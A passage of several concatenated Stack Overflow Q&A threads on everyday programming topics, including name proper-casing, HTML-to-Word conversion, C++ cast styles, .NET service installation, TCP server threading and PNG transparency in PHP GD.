wrote this today to implement in an app I'm working on. I think this code is pretty self explanatory with comments. It's not 100% accurate in all cases but it will handle most of your western names easily. Examples: mary-jane => Mary-Jane o'brien => O'Brien Joël VON WINTEREGG => Joël von Winteregg jose de la acosta => Jose de la Acosta The code is extensible in that you may add any string value to the arrays at the top to suit your needs. Please study it and add any special feature that may be required. function name_title_case($str) { // name parts that should be lowercase in most cases $ok_to_be_lower = array('av','af','da','dal','de','del','der','di','la','le','van','der','den','vel','von'); // name parts that should be lower even if at the beginning of a name $always_lower = array('van', 'der'); // Create an array from the parts of the string passed in $parts = explode(" ", mb_strtolower($str)); foreach ($parts as $part) { (in_array($part, $ok_to_be_lower)) ? $rules[$part] = 'nocaps' : $rules[$part] = 'caps'; } // Determine the first part in the string reset($rules); $first_part = key($rules); // Loop through and cap-or-dont-cap foreach ($rules as $part => $rule) { if ($rule == 'caps') { // ucfirst() words and also takes into account apostrophes and hyphens like this: // O'brien -> O'Brien || mary-kaye -> Mary-Kaye $part = str_replace('- ','-',ucwords(str_replace('-','- ', $part))); $c13n[] = str_replace('\' ', '\'', ucwords(str_replace('\'', '\' ', $part))); } else if ($part == $first_part && !in_array($part, $always_lower)) { // If the first part of the string is ok_to_be_lower, cap it anyway $c13n[] = ucfirst($part); } else { $c13n[] = $part; } } $titleized = implode(' ', $c13n); return trim($titleized); } A: Unless I've misunderstood your question I don't think you need to roll your own, the TextInfo class can do it for you. using System.Globalization; CultureInfo.InvariantCulture.TextInfo.ToTitleCase("GeOrGE bUrdEll") Will return "George Burdell. And you can use your own culture if there's some special rules involved. Update: Michael (in a comment to this answer) pointed out that this will not work if the input is all caps since the method will assume that it is an acronym. The naive workaround for this is to .ToLower() the text before submitting it to ToTitleCase. A: @zwol: I'll post it as a separate reply. Here's an example based on ljs's post. void Main() { List<string> names = new List<string>() { "bill o'reilly", "johannes diderik van der waals", "mr. moseley-williams", "Joe VanWyck", "mcdonald's", "william the third", "hrh prince charles", "h.r.m. queen elizabeth the third", "william gates, iii", "pope leo xii", "a.k. jennings" }; names.Select(name => name.ToProperCase()).Dump(); } // http://stackoverflow.com/questions/32149/does-anyone-have-a-good-proper-case-algorithm public static class ProperCaseHelper { public static string ToProperCase(this string input) { if (IsAllUpperOrAllLower(input)) { // fix the ALL UPPERCASE or all lowercase names return string.Join(" ", input.Split(' ').Select(word => wordToProperCase(word))); } else { // leave the CamelCase or Propercase names alone return input; } } public static bool IsAllUpperOrAllLower(this string input) { return (input.ToLower().Equals(input) || input.ToUpper().Equals(input)); } private static string wordToProperCase(string word) { if (string.IsNullOrEmpty(word)) return word; // Standard case string ret = capitaliseFirstLetter(word); // Special cases: ret = properSuffix(ret, "'"); // D'Artagnon, D'Silva ret = properSuffix(ret, "."); // ??? ret = properSuffix(ret, "-"); // Oscar-Meyer-Weiner ret = properSuffix(ret, "Mc", t => t.Length > 4); // Scots ret = properSuffix(ret, "Mac", t => t.Length > 5); // Scots except Macey // Special words: ret = specialWords(ret, "van"); // Dick van Dyke ret = specialWords(ret, "von"); // Baron von Bruin-Valt ret = specialWords(ret, "de"); ret = specialWords(ret, "di"); ret = specialWords(ret, "da"); // Leonardo da Vinci, Eduardo da Silva ret = specialWords(ret, "of"); // The Grand Old Duke of York ret = specialWords(ret, "the"); // William the Conqueror ret = specialWords(ret, "HRH"); // His/Her Royal Highness ret = specialWords(ret, "HRM"); // His/Her Royal Majesty ret = specialWords(ret, "H.R.H."); // His/Her Royal Highness ret = specialWords(ret, "H.R.M."); // His/Her Royal Majesty ret = dealWithRomanNumerals(ret); // William Gates, III return ret; } private static string properSuffix(string word, string prefix, Func<string, bool> condition = null) { if (string.IsNullOrEmpty(word)) return word; if (condition != null && ! condition(word)) return word; string lowerWord = word.ToLower(); string lowerPrefix = prefix.ToLower(); if (!lowerWord.Contains(lowerPrefix)) return word; int index = lowerWord.IndexOf(lowerPrefix); // If the search string is at the end of the word ignore. if (index + prefix.Length == word.Length) return word; return word.Substring(0, index) + prefix + capitaliseFirstLetter(word.Substring(index + prefix.Length)); } private static string specialWords(string word, string specialWord) { if (word.Equals(specialWord, StringComparison.InvariantCultureIgnoreCase)) { return specialWord; } else { return word; } } private static string dealWithRomanNumerals(string word) { // Roman Numeral parser thanks to [djk](https://stackoverflow.com/users/785111/djk) // Note that it excludes the Chinese last name Xi return new Regex(@"\b(?!Xi\b)(X|XX|XXX|XL|L|LX|LXX|LXXX|XC|C)?(I|II|III|IV|V|VI|VII|VIII|IX)?\b", RegexOptions.IgnoreCase).Replace(word, match => match.Value.ToUpperInvariant()); } private static string capitaliseFirstLetter(string word) { return char.ToUpper(word[0]) + word.Substring(1).ToLower(); } } A: What programming language do you use? Many languages allow callback functions for regular expression matches. These can be used to propercase the match easily. The regular expression that would be used is quite simple, you just have to match all word characters, like so: /\w+/ Alternatively, you can already extract the first character to be an extra match: /(\w)(\w*)/ Now you can access the first character and successive characters in the match separately. The callback function can then simply return a concatenation of the hits. In pseudo Python (I don't actually know Python): def make_proper(match): return match[1].to_upper + match[2] Incidentally, this would also handle the case of “O'Reilly” because “O” and “Reilly” would be matched separately and both propercased. There are however other special cases that are not handled well by the algorithm, e.g. “McDonald's” or generally any apostrophed word. The algorithm would produce “Mcdonald'S” for the latter. A special handling for apostrophe could be implemented but that would interfere with the first case. Finding a thereotical perfect solution isn't possible. In practice, it might help considering the length of the part after the apostrophe. A: Here's a perhaps naive C# implementation:- public class ProperCaseHelper { public string ToProperCase(string input) { string ret = string.Empty; var words = input.Split(' '); for (int i = 0; i < words.Length; ++i) { ret += wordToProperCase(words[i]); if (i < words.Length - 1) ret += " "; } return ret; } private string wordToProperCase(string word) { if (string.IsNullOrEmpty(word)) return word; // Standard case string ret = capitaliseFirstLetter(word); // Special cases: ret = properSuffix(ret, "'"); ret = properSuffix(ret, "."); ret = properSuffix(ret, "Mc"); ret = properSuffix(ret, "Mac"); return ret; } private string properSuffix(string word, string prefix) { if(string.IsNullOrEmpty(word)) return word; string lowerWord = word.ToLower(), lowerPrefix = prefix.ToLower(); if (!lowerWord.Contains(lowerPrefix)) return word; int index = lowerWord.IndexOf(lowerPrefix); // If the search string is at the end of the word ignore. if (index + prefix.Length == word.Length) return word; return word.Substring(0, index) + prefix + capitaliseFirstLetter(word.Substring(index + prefix.Length)); } private string capitaliseFirstLetter(string word) { return char.ToUpper(word[0]) + word.Substring(1).ToLower(); } } A: I know this thread has been open for awhile, but as I was doing research for this problem I came across this nifty site, which allows you to paste in names to be capitalized quite quickly: https://dialect.ca/code/name-case/. I wanted to include it here for reference for others doing similar research/projects. They release the algorithm they have written in php at this link: https://dialect.ca/code/name-case/name_case.phps A preliminary test and reading of their code suggests they have been quite thorough. A: a simple way to capitalise the first letter of each word (seperated by a space) $words = explode(” “, $string); for ($i=0; $i<count($words); $i++) { $s = strtolower($words[$i]); $s = substr_replace($s, strtoupper(substr($s, 0, 1)), 0, 1); $result .= “$s “; } $string = trim($result); in terms of catching the "O'REILLY" example you gave splitting the string on both spaces and ' would not work as it would capitalise any letter that appeared after a apostraphe i.e. the s in Fred's so i would probably try something like $words = explode(” “, $string); for ($i=0; $i<count($words); $i++) { $s = strtolower($words[$i]); if (substr($s, 0, 2) === "o'"){ $s = substr_replace($s, strtoupper(substr($s, 0, 3)), 0, 3); }else{ $s = substr_replace($s, strtoupper(substr($s, 0, 1)), 0, 1); } $result .= “$s “; } $string = trim($result); This should catch O'Reilly, O'Clock, O'Donnell etc hope it helps Please note this code is untested. A: Kronoz, thank you. I found in your function that the line: `if (!lowerWord.Contains(lowerPrefix)) return word`; must say if (!lowerWord.StartsWith(lowerPrefix)) return word; so "información" is not changed to "InforMacIón" best, Enrique A: I use this as the textchanged event handler of text boxes. Support entry of "McDonald" Public Shared Function DoProperCaseConvert(ByVal str As String, Optional ByVal allowCapital As Boolean = True) As String Dim strCon As String = "" Dim wordbreak As String = " ,.1234567890;/\-()#$%^&*€!~+=@" Dim nextShouldBeCapital As Boolean = True 'Improve to recognize all caps input 'If str.Equals(str.ToUpper) Then ' str = str.ToLower 'End If For Each s As Char In str.ToCharArray If allowCapital Then strCon = strCon & If(nextShouldBeCapital, s.ToString.ToUpper, s) Else strCon = strCon & If(nextShouldBeCapital, s.ToString.ToUpper, s.ToLower) End If If wordbreak.Contains(s.ToString) Then nextShouldBeCapital = True Else nextShouldBeCapital = False End If Next Return strCon End Function A: A lot of good answers here. Mine is pretty simple and only takes into account the names we have in our organization. You can expand it as you wish. This is not a perfect solution and will change vancouver to VanCouver, which is wrong. So tweak it if you use it. Here was my solution in C#. This hard-codes the names into the program but with a little work you could keep a text file outside of the program and read in the name exceptions (i.e. Van, Mc, Mac) and loop through them. public static String toProperName(String name) { if (name != null) { if (name.Length >= 2 && name.ToLower().Substring(0, 2) == "mc") // Changes mcdonald to "McDonald" return "Mc" + Regex.Replace(name.ToLower().Substring(2), @"\b[a-z]", m => m.Value.ToUpper()); if (name.Length >= 3 && name.ToLower().Substring(0, 3) == "van") // Changes vanwinkle to "VanWinkle" return "Van" + Regex.Replace(name.ToLower().Substring(3), @"\b[a-z]", m => m.Value.ToUpper()); return Regex.Replace(name.ToLower(), @"\b[a-z]", m => m.Value.ToUpper()); // Changes to title case but also fixes // appostrophes like O'HARE or o'hare to O'Hare } return ""; } A: You do not mention which language you would like the solution in so here is some pseudo code. Loop through each character If the previous character was an alphabet letter Make the character lower case Otherwise Make the character upper case End loop
{ "language": "en", "url": "https://stackoverflow.com/questions/32149", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "26" }
Q: Best way to export html to Word without having MS Word installed? Is there a way to export a simple HTML page to Word (.doc format, not .docx) without having Microsoft Word installed? A: There's a tool called JODConverter which hooks into open office to expose it's file format converters, there's versions available as a webapp (sits in tomcat) which you post to and a command line tool. I've been firing html at it and converting to .doc and pdf succesfully it's in a fairly big project, haven't gone live yet but I think I'm going to be using it. http://sourceforge.net/projects/jodconverter/ A: There is an open source project called HTMLtoWord that that allows users to insert fragments of well-formed HTML (XHTML) into a Word document as formatted text. HTMLtoWord documentation A: While it is possible to make a ".doc" Microsoft Word file, it would probably be easier and more portable to make a ".rtf" file. A: If you are working in Java, you can convert HTML to real docx content with code I released in docx4j 2.8.0. I say "real", because the alternative is to create an HTML altChunk, which relies on Word to do the actual conversion (when the document is first opened). See the various samples prefixed ConvertInXHTML. The import process expects well formed XML, so you might have to tidy it first. A: If you have only simple HTML pages as you said, it can be opened with Word. Otherwise, there are some libraries which can do this, but I don't have experience with them. My last idea is that if you are using ASP.NET, try to add application/msword to the header and you can save it as a Word document (it won't be a real Word doc, only an HTML renamed to doc to be able to open). A: Well, there are many third party tools for this. I don't know if it gets any simpler than that. Examples: * *http://htmltortf.com/ *http://www.brothersoft.com/windows-html-to-word-2008-56150.html *http://www.eprintdriver.com/to_word/HTML_to_Word_Doc.html Also found a vbscribt, but I'm guessing that requires that you have word installed. A: I presume from the "C#" tag you wish to achieve this programmatically. Try Aspose.Words for .NET. A: If it's just HTML, all you need to do is change the extension to .doc and word will open it as if it's a word document. However, if there are images to include or javascript to run it can get a little more complicated. A: i believe open office can both open .html files and create .doc files A: You can open html files with Libreoffice Writer. Then you can export as PDF from File menu. Also browsers can export html as a PDF file. A: use this link to export to word, but here image wont work: http://www.jqueryscript.net/other/Export-Html-To-Word-Document-With-Images-Using-jQuery-Word-Export-Plugin.html
{ "language": "en", "url": "https://stackoverflow.com/questions/32151", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "16" }
Q: C++ cast syntax styles A question related to Regular cast vs. static_cast vs. dynamic_cast: What cast syntax style do you prefer in C++? * *C-style cast syntax: (int)foo *C++-style cast syntax: static_cast<int>(foo) *constructor syntax: int(foo) They may not translate to exactly the same instructions (do they?) but their effect should be the same (right?). If you're just casting between the built-in numeric types, I find C++-style cast syntax too verbose. As a former Java coder I tend to use C-style cast syntax instead, but my local C++ guru insists on using constructor syntax. What do you think? A: Regarding this subject, I'm following the recommandations made by Scott Meyers (More Effective C++, Item 2 : Prefer C++-style casts). I agree that C++ style cast are verbose, but that's what I like about them : they are very easy to spot, and they make the code easier to read (which is more important than writing). They also force you to think about what kind of cast you need, and to chose the right one, reducing the risk of mistakes. They will also help you detecting errors at compile time instead at runtime. A: It's best practice never to use C-style casts for three main reasons: * *as already mentioned, no checking is performed here. The programmer simply cannot know which of the various casts is used which weakens strong typing *the new casts are intentionally visually striking. Since casts often reveal a weakness in the code, it's argued that making casts visible in the code is a good thing. *this is especially true if searching for casts with an automated tool. Finding C-style casts reliably is nearly impossible. As palm3D noted: I find C++-style cast syntax too verbose. This is intentional, for the reasons given above. The constructor syntax (official name: function-style cast) is semantically the same as the C-style cast and should be avoided as well (except for variable initializations on declaration), for the same reasons. It is debatable whether this should be true even for types that define custom constructors but in Effective C++, Meyers argues that even in those cases you should refrain from using them. To illustrate: void f(auto_ptr<int> x); f(static_cast<auto_ptr<int> >(new int(5))); // GOOD f(auto_ptr<int>(new int(5)); // BAD The static_cast here will actually call the auto_ptr constructor. A: Definitely C++-style. The extra typing will help prevent you from casting when you shouldn't :-) A: I use static_cast for two reasons. * *It's explicitly clear what's taking place. I can't read over that without realizing there's a cast going on. With C-style casts you eye can pass right over it without pause. *It's easy to search for every place in my code where I'm casting. A: The constructor syntax. C++ is OO, constructors exist, I use them. If you feel the need to annotate these conversion ctor's you should do it for every type, not just the built-in ones. Maybe you use the 'explicit' keyword for conversion ctors but the client syntax mimics exactly what the ctor syntax for built-in types does. Being greppable, that may be true, but what a big surprise that typing more characters makes searches easy. Why treat these ones as special? If you are writing math formulas with lots of int/unsigned/... to and from double/float - graphics - and you need to write a static_cast every time, the look of the formula gets cluttered and is very much unreadable. And it's an uphill battle anyway as a lot of times you will convert without even noticing that you are. For downcasting pointers I do use the static_cast as of course no ctor exists by default that would do that. A: According to Stroustrup: The "new-style casts" were introduced to give programmers a chance to state their intentions more clearly and for the compiler to catch more errors. So really, its for safety as it does extra compile-time checking. A: C-style cast syntax, do not error check. C++-style cast syntax, does some checking. When using static_cast, even if it doesn't do checking, at least you know you should be carefull here. A: C-style cast is the worst way to go. It's harder to see, ungreppable, conflates different actions that should not be conflated, and can't do everything that C++-style casts can do. They really should have removed C-style casts from the language. A: We currently use C-style casts everywhere. I asked the other casting question, and I now see the advantage of using static_cast instead, if for no other reason than it's "greppable" (I like that term). I will probably start using that. I don't like the C++ style; it looks too much like a function call. A: Go for C++ style and, at worse, the ugly verbose code snippets that comprised C++'s explicit typecast will be a constant reminder of what we all know (i.e explicit casting is bad -- the lead to the coin-ing of expletives). Do not go with C++ style if you want to master the art of tracking runtime errors.
{ "language": "en", "url": "https://stackoverflow.com/questions/32168", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "37" }
Q: Disable asp.net radiobutton with javascript I'm trying to disable a bunch of controls with JavaScript (so that they post back values). All the controls work fine except for my radio buttons as they lose their value. In the below code which is called via a recursive function to disable all child controls the Second else (else if (control is RadioButton)) is never hit and the RadioButton control is identified as a Checkbox control. private static void DisableControl(WebControl control) { if (control is CheckBox) { ((CheckBox)control).InputAttributes.Add("disabled", "disabled"); } else if (control is RadioButton) { } else if (control is ImageButton) { ((ImageButton)control).Enabled = false; } else { control.Attributes.Add("readonly", "readonly"); } } Two Questions: 1. How do I identify which control is a radiobutton? 2. How do I disable it so that it posts back its value? A: I found 2 ways to get this to work, the below code correctly distinguishes between the RadioButton and Checkbox controls. private static void DisableControl(WebControl control) { Type controlType = control.GetType(); if (controlType == typeof(CheckBox)) { ((CheckBox)control).InputAttributes.Add("disabled", "disabled"); } else if (controlType == typeof(RadioButton)) { ((RadioButton)control).InputAttributes.Add("disabled", "true"); } else if (controlType == typeof(ImageButton)) { ((ImageButton)control).Enabled = false; } else { control.Attributes.Add("readonly", "readonly"); } } And the solution I used is to set SubmitDisabledControls="True" in the form element which is not ideal as it allows a user to fiddle with the values but is fine in my scenario. The second solution is to mimic the Disabled behavior and details can be found here: https://web.archive.org/web/20210608183803/http://aspnet.4guysfromrolla.com/articles/012506-1.aspx'>https://web.archive.org/web/20210608183803/http://aspnet.4guysfromrolla.com/articles/012506-1.aspx. A: Off the top of my head, I think you have to check the "type" attribute of the checkbox to determine if it's a radio button.
{ "language": "en", "url": "https://stackoverflow.com/questions/32173", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Installing a .NET service using InstallUtil I'm trying to install a .NET service I wrote. As recommended by MSDN, I'm using InstallUtil. But I have missed how I can set the default service user on the command-line or even in the service itself. Now, when InstallUtil is run, it will display a dialog asking the user for the credentials for a user. I'm trying to integrate the service installation into a larger install and need the service installation to remain silent. A: I think I may have found it. In the service itself, the automatically created ServiceProcessInstaller component has a property "Account" which can be set to "LocalService", "LocalSystem", "NetworkService" or "User". It was defaulting to "User" which must have displayed the prompt. A: As you noticed, Karim, "Account" property is the solution, here. For those interested in differences between security contexts set by this property: http://msdn.microsoft.com/en-us/library/system.serviceprocess.serviceaccount.aspx Above using InstallUtil or SC, I like the idea of creating a SELF INSTALLER: http://www.codeproject.com/KB/dotnet/WinSvcSelfInstaller.aspx even though I found this in the .Net 1.1 documentation: The ManagedInstallerClass type supports the .NET Framework infrastructure and is not intended to be used directly from your code. A: Also keep in mind the SC.exe util which does not require visual studio to be installed. You can simply copy this exe to the server you want to create the service or even run it remotely. Use the obj parameter to specify a user. Apparently there is a GUI for this tool, but I have not used it. A: Are you being asked for the account to run the service under, or for rights to install the service? For the second, installing as admin should prevent that from happening. For the first, you have to add a ServiceProcessInstaller to your Installer. I believe the design surface for a service has a link to create a Project Installer. On that designer, you can add a process installer of type System.ServiceProcess.ServiceProcessInstaller. The properties of this object allow you to set the account to use for the service. A: InstallUtil has command line switches which can avoid the prompts when using "User" as the account type. /username and /password are used configure the account at install time. Usage: installutil.exe /username=user /password=password yourservice.exe What you may want is to have a config file where the installer can read and install the service. To do so, add a service installer to your project, and overload the install method. In this method, set the username and password: public override void Install(IDictionary stateSaver) { serviceProcessInstaller1.Username="<username>"; serviceProcessInstaller1.Password="<password>"; base.Install(stateSaver); } If you try to set the username and password in the constructor, those values will be overwritten, so make sure you override "Install" to do so.
{ "language": "en", "url": "https://stackoverflow.com/questions/32175", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "38" }
Q: How do you minimize the number of threads used in a tcp server application? I am looking for any strategies people use when implementing server applications that service client TCP (or UDP) requests: design patterns, implementation techniques, best practices, etc. Let's assume for the purposes of this question that the requests are relatively long-lived (several minutes) and that the traffic is time sensitive, so no delays are acceptable in responding to messages. Also, we are both servicing requests from clients and making our own connections to other servers. My platform is .NET, but since the underlying technology is the same regardless of platform, I'm interested to see answers for any language. A: The modern approach is to make use of the operating system to multiplex many network sockets for you, freeing your application to only processing active connections with traffic. Whenever you open a socket it's associated it with a selector. You use a single thread to poll that selector. Whenever data arrives, the selector will indicate the socket which is active, you hand off that operation to a child thread and continue polling. This way you only need a thread for each concurrent operation. Sockets which are open but idle will not tie up a thread. * *Using the select() and poll() methods *Building Highly Scalable Servers with Java NIO A: A more sophosticated aproach would be to use IO Completion ports. (Windows) With IO Completion ports you leave to the operating system to manage polling, which lets it potentially use very high level of optimization with NIC driver support. Basically, you have a queue of network operations which is OS managed, and provide a callback function which is called when the operation completes. A bit like (Hard-drive) DMA but for network. Len Holgate wrote an eccelent series on IO completion ports a few years ago on Codeproject: http://www.codeproject.com/KB/IP/jbsocketserver2.aspx And I found an article on IO completion ports for .net (haven't read it though) http://www.codeproject.com/KB/cs/managediocp.aspx I would also say that it is easy to use completion ports compared to try and write a scaleable alternative. The problem is that they are only available on NT (2000, XP, Vista) A: If you were using C++ and the Win32 directly then I'd suggest that you read up about overlapped I/O and I/O Completion ports. I have a free C++, IOCP, client/server framework with complete source code, see here for more details. Since you're using .Net you should be looking at using the asynchronous socket methods so that you don't need have a thread for every connection; there are several links from this blog posting of mine that may be useful starting points: http://www.lenholgate.com/blog/2005/07/disappointing-net-sockets-article-in-msdn-magazine-this-month.html (some of the best links are in the comments to the original posting!) A: G'day, I'd start by looking at the metaphor you want to use for your thread framework. Maybe "leader follower" where a thread is listening for incoming requests and when a new request comes in it does the work and the next thread in the pool starts listening for incoming requests. Or thread pool where the same thread is always listening for incoming requests and then passing the requests over to the next available thread in the thread pool. You might like to visit the Reactor section of the Ace Components to get some ideas. HTH. cheers, Rob
{ "language": "en", "url": "https://stackoverflow.com/questions/32198", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Data model for a extensible web form Suppose that I have a form that contains three 10 fields: field1..field10. I store the form data in one or more database tables, probably using 10 database columns. Now suppose a few months later that I want to add 3 more fields. And in the future I may add/delete fields from this form based on changing requirements. If I have a database column per form field, then I would have to make the corresponding changes to the database each time I change the form. This seems like a maintenance headache. There must be a more sophisticated way. So my question is, how do I design a data model that is loosely coupled with my UI? A concrete use case is a CRM system that is extensible/customizable by users. A: You could abstract fields to a separate table so that they are many-to-many to the Form table: Form ID Name etc. Field ID Label Value FormField FormID FieldID A: Unless you have a really good reason to do this, then this generally is a bad idea. It makes it very difficult to optimize and scale the database. If you absolutely must do it, then Travis's suggestion is fine for small tables, but its not really going to scale that well. A: My team came up with a solution for this when I worked for Quest Computing on AIMS (www.totalaims.com). In summary we added maintenance screens that allowed the administrator to add metadata and also as a result add fields to the database in certain tables. The fields were also added to their own maintenance and search screens automatically. We built this on top of the OpenACS. You can find out more at www.openacs.org - search for "flexbase" or "dynfields" or look here www.project-open.org/doc/intranet-dynfield/ . This worked quite well - them main downside being a side effect of the main upside i.e. that addition of fields could be done by non-DBAs and as a result performance could easily be compromised. A: I have done this in the past using an XML column in the database to store the extra fields. I generally just have a big property bag in the XML column and then use XSD to enforce validation when doing updates or inserts. When I am retrieving the data I have rules in XSL or the object model that determine if the element is displayed, what additional formatting to apply and for web forms what type of input element to use based on the type of data in the property node. It works really well if there is a need to have some data stored relationally and other data stored extensibly to avoid the wide table with lots of null rows effect. If you don't need to do relational things with the data, such as joining or pivoting with other tables in the database, then a simple self contained XML form is a good solution as well. Most databases now have first class XML support for this sort of thing. In SQL Server for example you can apply an XSD schema to a column of an XML datatype right in the datbase. In recent versions there is also support for indexing on those columns.
{ "language": "en", "url": "https://stackoverflow.com/questions/32227", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Adaptive Database Are there any rapid Database protoyping tools that don't require me to declare a database schema, but rather create it based on the way I'm using my entities. For example, assuming an empty database (pseudo code): user1 = new User() // Creates the user table with a single id column user1.firstName = "Allain" // alters the table to have a firstName column as varchar(255) user2 = new User() // Reuses the table user2.firstName = "Bob" user2.lastName = "Loblaw" // Alters the table to have a last name column Since there are logical assumptions that can be made when dynamically creating the schema, and you could always override its choices by using your DB tools to tweak it later. Also, you could generate your schema by unit testing it this way. And obviously this is only for prototyping. Is there anything like this out there? A: Google's Application Engine works like this. When you download the toolkit you get a local copy of the database engine for testing. A: Grails uses Hibernate to persist domain objects and produces behavior similar to what you describe. To alter the schema you simply modify the domain, in this simple case the file is named User.groovy. class User { String userName String firstName String lastName Date dateCreated Date lastUpdated static constraints = { userName(blank: false, unique: true) firstName(blank: false) lastName(blank: false) } String toString() {"$lastName, $firstName"} } Saving the file alters the schema automatically. Likewise, if you are using scaffolding it is updated. The prototype process becomes run the application, view the page in your browser, modify the domain, refresh the browser, and see the changes. A: I agree with the NHibernate approach and auto-database-generation. But, if you want to avoid writing a configuration file, and stay close to the code, use Castle's ActiveRecord. You declare the 'schema' directly on the class with via attributes. [ActiveRecord] public class User : ActiveRecordBase<User> { [PrimaryKey] public Int32 UserId { get; set; } [Property] public String FirstName { get; set; } } There are a variety of constraints you can apply (validation, bounds, etc) and you can declare relationships between different data model classes. Most of these options are parameters added to the attributes. It's rather simple. So, you're working with code. Declaring usage in code. And when you're done, let ActiveRecord create the database. ActiveRecordStarter.Initialize(); ActiveRecordStarter.CreateSchema(); A: May be not exactly responding to your general question, but if you used (N)Hibernate then you can automatically generate the database schema from your hbm mapping files. Its not done directly from your code as you seem to be wanting but Hibernate Schema generation seems to work well for us A: Do you want the schema, but have it generated, or do you actually want NO schema? For the former I'd go with nhibernate as @tom-carter said. Have it generate your schema for you, and you are all good (atleast until you roll your app out, then look at something like Tarantino and RedGate SQL Diff or whatever it's called to generate update scripts) If you want the latter.... google app engine does this, as I've discovered this afternoon, and it's very nice. If you want to stick with code under your control, I'd suggest looking at CouchDB, tho it's a bit of upfront work getting it setup. But once you have it, it's a totally, 100% schema-free database. Well, you have an ID and a Version, but thats it - the rest is up to you. http://incubator.apache.org/couchdb/ But by the sounds of it (N)hibernate would suite the best, but I could be wrong. A: You could use an object database.
{ "language": "en", "url": "https://stackoverflow.com/questions/32231", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Algorithm to format text to Pascal or camel casing Using this question as the base is there an alogrithm or coding example to change some text to Pascal or Camel casing. For example: mynameisfred becomes Camel: myNameIsFred Pascal: MyNameIsFred A: I found a thread with a bunch of Perl guys arguing the toss on this question over at http://www.perlmonks.org/?node_id=336331. I hope this isn't too much of a non-answer to the question, but I would say you have a bit of a problem in that it would be a very open-ended algorithm which could have a lot of 'misses' as well as hits. For example, say you inputted:- camelCase("hithisisatest"); The output could be:- "hiThisIsATest" Or:- "hitHisIsATest" There's no way the algorithm would know which to prefer. You could add some extra code to specify that you'd prefer more common words, but again misses would occur (Peter Norvig wrote a very small spelling corrector over at http://norvig.com/spell-correct.html which might help algorithm-wise, I wrote a C# implementation if C#'s your language). I'd agree with Mark and say you'd be better off having an algorithm that takes a delimited input, i.e. this_is_a_test and converts that. That'd be simple to implement, i.e. in pseudocode:- SetPhraseCase(phrase, CamelOrPascal): if no delimiters if camelCase return lowerFirstLetter(phrase) else return capitaliseFirstLetter(phrase) words = splitOnDelimiter(phrase) if camelCase ret = lowerFirstLetter(first word) else ret = capitaliseFirstLetter(first word) for i in 2 to len(words): ret += capitaliseFirstLetter(words[i]) return ret capitaliseFirstLetter(word): if len(word) <= 1 return upper(word) return upper(word[0]) + word[1..len(word)] lowerFirstLetter(word): if len(word) <= 1 return lower(word) return lower(word[0]) + word[1..len(word)] You could also replace my capitaliseFirstLetter() function with a proper case algorithm if you so wished. A C# implementation of the above described algorithm is as follows (complete console program with test harness):- using System; class Program { static void Main(string[] args) { var caseAlgorithm = new CaseAlgorithm('_'); while (true) { string input = Console.ReadLine(); if (string.IsNullOrEmpty(input)) return; Console.WriteLine("Input '{0}' in camel case: '{1}', pascal case: '{2}'", input, caseAlgorithm.SetPhraseCase(input, CaseAlgorithm.CaseMode.CamelCase), caseAlgorithm.SetPhraseCase(input, CaseAlgorithm.CaseMode.PascalCase)); } } } public class CaseAlgorithm { public enum CaseMode { PascalCase, CamelCase } private char delimiterChar; public CaseAlgorithm(char inDelimiterChar) { delimiterChar = inDelimiterChar; } public string SetPhraseCase(string phrase, CaseMode caseMode) { // You might want to do some sanity checks here like making sure // there's no invalid characters, etc. if (string.IsNullOrEmpty(phrase)) return phrase; // .Split() will simply return a string[] of size 1 if no delimiter present so // no need to explicitly check this. var words = phrase.Split(delimiterChar); // Set first word accordingly. string ret = setWordCase(words[0], caseMode); // If there are other words, set them all to pascal case. if (words.Length > 1) { for (int i = 1; i < words.Length; ++i) ret += setWordCase(words[i], CaseMode.PascalCase); } return ret; } private string setWordCase(string word, CaseMode caseMode) { switch (caseMode) { case CaseMode.CamelCase: return lowerFirstLetter(word); case CaseMode.PascalCase: return capitaliseFirstLetter(word); default: throw new NotImplementedException( string.Format("Case mode '{0}' is not recognised.", caseMode.ToString())); } } private string lowerFirstLetter(string word) { return char.ToLower(word[0]) + word.Substring(1); } private string capitaliseFirstLetter(string word) { return char.ToUpper(word[0]) + word.Substring(1); } } A: The only way to do that would be to run each section of the word through a dictionary. "mynameisfred" is just an array of characters, splitting it up into my Name Is Fred means understanding what the joining of each of those characters means. You could do it easily if your input was separated in some way, e.g. "my name is fred" or "my_name_is_fred".
{ "language": "en", "url": "https://stackoverflow.com/questions/32241", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Can PNG image transparency be preserved when using PHP's GDlib imagecopyresampled? The following PHP code snippet uses GD to resize a browser-uploaded PNG to 128x128. It works great, except that the transparent areas in the original image are being replaced with a solid color- black in my case. Even though imagesavealpha is set, something isn't quite right. What's the best way to preserve the transparency in the resampled image? $uploadTempFile = $myField[ 'tmp_name' ] list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile ); $srcImage = imagecreatefrompng( $uploadTempFile ); imagesavealpha( $targetImage, true ); $targetImage = imagecreatetruecolor( 128, 128 ); imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight ); imagepng( $targetImage, 'out.png', 9 ); A: An addition that might help some people: It is possible to toggle imagealphablending while building the image. I the specific case that I needed this, I wanted to combine some semi-transparent PNG's on a transparent background. First you set imagealphablending to false and fill the newly created true color image with a transparent color. If imagealphablending were true, nothing would happen because the transparent fill would merge with the black default background and result in black. Then you toggle imagealphablending to true and add some PNG images to the canvas, leaving some of the background visible (ie. not filling up the entire image). The result is an image with a transparent background and several combined PNG images. A: I have made a function for resizing image like JPEG/GIF/PNG with copyimageresample and PNG images still keep there transparency: $myfile=$_FILES["youimage"]; function ismyimage($myfile) { if((($myfile["type"] == "image/gif") || ($myfile["type"] == "image/jpg") || ($myfile["type"] == "image/jpeg") || ($myfile["type"] == "image/png")) && ($myfile["size"] <= 2097152 /*2mb*/) ) return true; else return false; } function upload_file($myfile) { if(ismyimage($myfile)) { 